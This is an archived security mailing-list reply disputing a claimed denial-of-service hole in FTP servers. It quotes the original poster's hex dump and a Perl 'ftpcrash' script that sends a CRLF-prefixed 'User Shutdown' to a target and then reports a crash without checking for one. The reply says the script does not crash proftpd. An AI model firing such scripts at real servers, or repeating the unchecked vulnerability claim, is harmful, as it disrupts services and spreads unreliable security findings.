lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <hjtlb7.pc2c1t@d101.x-mailer.de>
From: a.gietl at e-admin.de (Andreas Gietl)
Subject: FTPServer Denial Of Service Vulnerability

"Florian Rock" <florianrock@....de> wrote:

it does not crash proftpd....

and your code is really bad. it just waits a second and then says the server
has crashed without any checks - it just sees whether it can send your
"exploit" code .....

> I have found a very serious hole in FTPServer
> The Exploit is tested on Cerberus FTP Server 1.71 and a own coded, but I
think
> all FTPServer are Vulnerable
> Sorry but i have to less ftpserver to test
> 
> And so it Works
> Typical request:
> 00000000  55 73 65 72 20 53  68 75 74 64 6f 77 6e 0d 0a    User Shutdown..
> 
> Exploit request:
> 00000000  0d 0a 55 73 65 72 20 53  68 75 74 64 6f 77 6e    ..User Shutdown
> 
> I've coded an exploit:
> See attached file: ftpcrash.exe (ziped) for people how have no perl
> 
> My exploit (in perl):
> [code]
> -ftpcrash.pl-
> print "Exploit for FTP-Server\n";
> print "   by The real Remoter\n";
> my $usage = "\nftpcrash <IP> <Port>\n";
> die "$usage" unless $ARGV[0] && $ARGV[1];
> use Socket;
> my $remote = $ARGV[0];
> my $port = $ARGV[1];
> my $iaddr = inet_aton($remote);
> my $proto = getprotobyname("tcp");
> my $paddr = sockaddr_in($port, $iaddr);
> socket(SOCK, PF_INET, SOCK_STREAM, $proto);
> connect(SOCK, $paddr) or die "Can't connect to " . $remote;
> print "Sending exploit\n";
> $msg = "\x0d\x0a";
> $msg = $msg . "User Shutdown";
> send(SOCK,$msg, 0) or die "Can't send Exploit";
> sleep(1);
> print "Server Crashed!";
> sleep(1);
> exit;
> [/code]
> 
> Sorry for my bad english (I'm german)




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ